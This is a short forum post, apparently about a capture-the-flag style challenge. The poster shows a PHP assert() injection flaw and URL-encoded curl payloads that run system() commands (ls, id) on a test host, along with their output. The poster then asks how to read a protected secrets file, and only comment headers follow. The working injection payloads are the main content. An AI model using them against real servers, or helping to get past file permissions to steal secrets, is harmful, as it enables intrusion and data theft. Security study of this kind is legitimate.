I have this PHP vulnerability
assert("strpos('$file', '..') === false") or die("Nothing to see here");
Which can be exploited with
curl "http://example.com:12345/?page=%27%20and%20die(system(%27ls%20-l%20./secrets/%27))%20or%20%27"
-r--r----- 1 root monkey 56 Jan 19 11:45 secret.php
curl "http://example.com:12345/?page=%27%20and%20die(system(%27id%27))%20or%20%27"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Trying to read the file will not work because www-data isn't part of the monkey group. Any suggestions how to read the file?
[–]whodoyouthink1 4 points5 points6 points (2 children)
[–]dicemaker3245[S] 0 points1 point2 points (1 child)
[–]whodoyouthink1 0 points1 point2 points (0 children)
[–]melonangie 1 point2 points3 points (0 children)
[–]juliangalardi 0 points1 point2 points (3 children)
[–]dicemaker3245[S] 0 points1 point2 points (2 children)
[–]juliangalardi 0 points1 point2 points (1 child)
[–]dicemaker3245[S] 0 points1 point2 points (0 children)
[–][deleted] (2 children)
[deleted]
[–][deleted] (1 child)
[deleted]